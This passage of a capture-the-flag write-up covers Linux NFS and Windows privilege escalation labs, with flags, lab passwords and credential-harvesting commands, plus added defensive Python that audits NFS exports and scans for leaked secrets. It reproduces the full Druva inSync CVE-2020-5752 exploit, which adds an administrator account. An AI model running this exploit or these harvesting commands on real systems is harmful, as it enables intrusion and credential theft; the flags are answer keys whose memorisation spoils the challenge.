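The defensive fixes follow directly from the model: a SUID or sudo-run program should invoke helpers by absolute path or reset PATH itself, and sudo's secure_path exists precisely so that the caller's environment does not decide what runs as root.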

Privilege Escalation: NFS

How many mountable shares can you identify on the target system?

3

How many shares have the “no_root_squash” option enabled?

3

What is the content of the flag7.txt file?

THM-89384012
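
The NFS questions above are answered by reading /etc/exports, and that file is also where an administrator would catch the problem. The following Python is an added example, not from the original notes or from the nfs-utils project: it parses a constructed exports file into one record per share and client, treats root_squash as the default it is when no_root_squash is absent, and reports shares that keep client root as uid 0, accept requests from unprivileged source ports (insecure), or are read-write for every client. The exports text and function names are assumptions made for the example.

```python
import re

# Constructed /etc/exports; three of the four shares disable root squashing.
EXPORTS_FILE = """\
# /etc/exports: the access control list for filesystems which may be exported
#               to NFS clients.  See exports(5).
/srv/backup        *(rw,sync,insecure,no_root_squash,no_subtree_check)
/tmp               *(rw,sync,insecure,no_root_squash,no_subtree_check)
/srv/shared        10.10.0.0/16(rw,sync,no_root_squash,no_subtree_check)
/srv/public        10.10.0.0/16(ro,sync,no_subtree_check)
"""

# One client token: "client" or "client(opt,opt,...)"
CLIENT_RX = re.compile(r"^([^(]+)(?:\(([^)]*)\))?$")


def parse_exports(text):
    """Return one dict per (path, client) pair with the option set for that client."""
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        parts = line.split(None, 1)
        path = parts[0]
        tokens = parts[1].split() if len(parts) > 1 else []
        for token in tokens:
            m = CLIENT_RX.match(token)
            if not m:
                continue
            options = set(m.group(2).split(",")) if m.group(2) else set()
            exports.append({
                "path": path,
                "client": m.group(1),
                "options": options,
                # root_squash is the default; only an explicit no_root_squash turns it off
                "no_root_squash": "no_root_squash" in options,
            })
    return exports


def risky_exports(exports):
    """(path, client, reasons) for every export with a risky option combination."""
    out = []
    for e in exports:
        reasons = []
        if e["no_root_squash"]:
            reasons.append("no_root_squash: client root keeps uid 0 on the share")
        if "insecure" in e["options"]:
            reasons.append("insecure: requests accepted from unprivileged source ports")
        if e["client"] == "*" and "rw" in e["options"]:
            reasons.append("rw for any client")
        if reasons:
            out.append((e["path"], e["client"], reasons))
    return out


if __name__ == "__main__":
    for path, client, reasons in risky_exports(parse_exports(EXPORTS_FILE)):
        print(path, client, "->", "; ".join(reasons))
```

Note that the parser is per client: a path exported twice, once to a trusted subnet with no_root_squash and once read-only to the world, is reported as two records, which is how exportfs treats it as well.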

Capstone Challenge

I tried the PATH method but that didn’t work for me and I was still getting a shell as Leonard. Then I used the SUID method as base64 has the SUID bit set.

Use the same technique we used in the challenge: read /etc/passwd and /etc/shadow, then run john on them to get the passwords.

What is the content of the flag1.txt file?

THM-42828719920544

What is the content of the flag2.txt file?

THM-168824782390238

Windows Privilege Escalation

Windows Privilege Escalation

Users that can change system configurations are part of which group?

Administrators

The SYSTEM account has more privileges than the Administrator user (aye/nay)

aye

Harvesting Passwords from Usual Spots

Connect to the Windows machine using an RDP client (Remmina) and the provided credentials.

A password for the julia.jones user has been left on the Powershell history. What is the password?

Run the command %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt in CMD

ZuperCkretPa5z

A web server is running on the remote host. Find any interesting password on web.config files associated with IIS. What is the password of the db_admin user?

Run the command

type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

098n0x35skjD3

There is a saved password on your Windows credentials. Using cmdkey and runas, spawn a shell for mike.katz and retrieve the flag from his desktop.

Run the command in CMD

runas /savecred /user:mike.katz cmd.exe
# Once popping a shell as mike.katz
type C:\Users\mike.katz\Desktop\flag.txt
THM{WHAT_IS_MY_PASSWORD}

Retrieve the saved password stored in the saved PuTTY session under your profile. What is the password for the thom.smith user?

Run the command in CMD

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
CoolPass2021
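
Every answer in this section came from a credential left in a text artefact: PowerShell history, an IIS web.config, a saved credential, a PuTTY session. The following Python is an added example, not from the original notes or from any Microsoft tool: it scans constructed copies of a ConsoleHost_history.txt and a web.config for the credential patterns seen on this page (a ConvertTo-SecureString literal, net user ... /add, cmdkey /pass:, and Password= inside a connection string) and reports each hit with the secret redacted, so the report itself does not become the next leak. The sample texts, the placeholder passwords and the rule and function names are assumptions made for the example.

```python
import re

# Constructed PSReadline history; the passwords are placeholders, not real credentials.
PS_HISTORY = """\
Get-ChildItem C:\\Users
$pw = ConvertTo-SecureString 'Placeh0lderPass1!' -AsPlainText -Force
net user svc_backup Placeh0lderPass2 /add
cmdkey /add:backupsrv /user:backup /pass:Placeh0lderPass3
Get-Process | Sort-Object CPU -Descending
"""

# Constructed IIS web.config with a connection string carrying a password.
WEB_CONFIG = """\
<configuration>
  <connectionStrings>
    <add name="LocalDb" connectionString="Server=localhost;Database=app;User ID=db_admin;Password=Placeh0lderPass4;" />
  </connectionStrings>
  <appSettings>
    <add key="theme" value="dark" />
  </appSettings>
</configuration>
"""

# (rule name, regex whose group 1 is the secret). Kept small and readable on purpose.
SECRET_RULES = [
    ("securestring_literal", re.compile(r"ConvertTo-SecureString\s+['\"]?([^'\"\s]+)", re.I)),
    ("net_user_password", re.compile(r"\bnet\s+user\s+\S+\s+(\S+)\s+/add\b", re.I)),
    ("cmdkey_pass", re.compile(r"/pass:(\S+)", re.I)),
    ("connection_string_password", re.compile(r"(?:Password|Pwd)=([^;\"']+)", re.I)),
]


def redact(line, match):
    """Replace only the captured secret so the context stays readable."""
    return line[:match.start(1)] + "<redacted>" + line[match.end(1):]


def find_secrets(text, source):
    """Return [{'source', 'line', 'rule', 'redacted'}] for every line matching a rule."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, rx in SECRET_RULES:
            m = rx.search(line)
            if m:
                findings.append({"source": source, "line": lineno, "rule": name,
                                 "redacted": redact(line, m).strip()})
    return findings


if __name__ == "__main__":
    for f in find_secrets(PS_HISTORY, "ConsoleHost_history.txt") + find_secrets(WEB_CONFIG, "web.config"):
        print("%s:%d [%s] %s" % (f["source"], f["line"], f["rule"], f["redacted"]))
```

Scanning these locations on a schedule is cheap, and the remediation is the same each time: rotate the exposed password, move the secret into a credential store or an encrypted configuration section, and clear the history file that recorded it.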

Other Quick Wins

Follow the guide provided; once you run the scheduled task you will get a reverse shell in your netcat listener.

[Screenshot: Quick Wins]

Run

type C:\Users\taskusr1\Desktop\flag.txt
THM{TASK_COMPLETED}

Abusing Service Misconfigurations

Get the flag on svcusr1’s desktop.

THM{AT_YOUR_SERVICE}

Get the flag on svcusr2’s desktop.

THM{QUOTES_EVERYWHERE}

Get the flag on the Administrator’s desktop.

THM{INSECURE_SVC_CONFIG}

Abusing Dangerous Privileges

Get the flag on the Administrator’s desktop.

I used the SeImpersonate / SeAssignPrimaryToken method to get the flag from the Administrator Desktop. Once you get a reverse shell in your NC listener from the web shell use this command -

type C:\Users\Administrator\Desktop\flag.txt
THM{SEFLAGPRIVILEGE}

Abusing vulnerable software

Get the flag on the Administrator’s desktop.

Edit the C:\tools\Druva_inSync_exploit.txt and update the $cmd variable

# Exploit Title: Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)
# Date: 2020-12-03
# Exploit Author: 1F98D
# Original Author: Matteo Malvica
# Vendor Homepage: druva.com
# Software Link: https://downloads.druva.com/downloads/inSync/Windows/6.6.3/inSync6.6.3r102156.msi
# Version: 6.6.3
# Tested on: Windows 10 (x64)
# CVE: CVE-2020-5752
# References: https://www.matteomalvica.com/blog/2020/05/21/lpe-path-traversal/
# Druva inSync exposes an RPC service which is vulnerable to a command injection attack.

$ErrorActionPreference = "Stop"

$cmd = "net user pwnd SimplePass123 /add & net localgroup administrators pwnd /add"

$s = New-Object System.Net.Sockets.Socket(
    [System.Net.Sockets.AddressFamily]::InterNetwork,
    [System.Net.Sockets.SocketType]::Stream,
    [System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)

$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
$length = [System.BitConverter]::GetBytes($command.Length);

$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)

Open a PowerShell window, paste the script there and run it. Then open a Command Prompt as Administrator, entering the credentials of the pwnd user, and run the following command to get the flag.

type C:\Users\Administrator\Desktop\flag.txt
THM{EZ_DLL_PROXY_4ME}

Fin. 🙂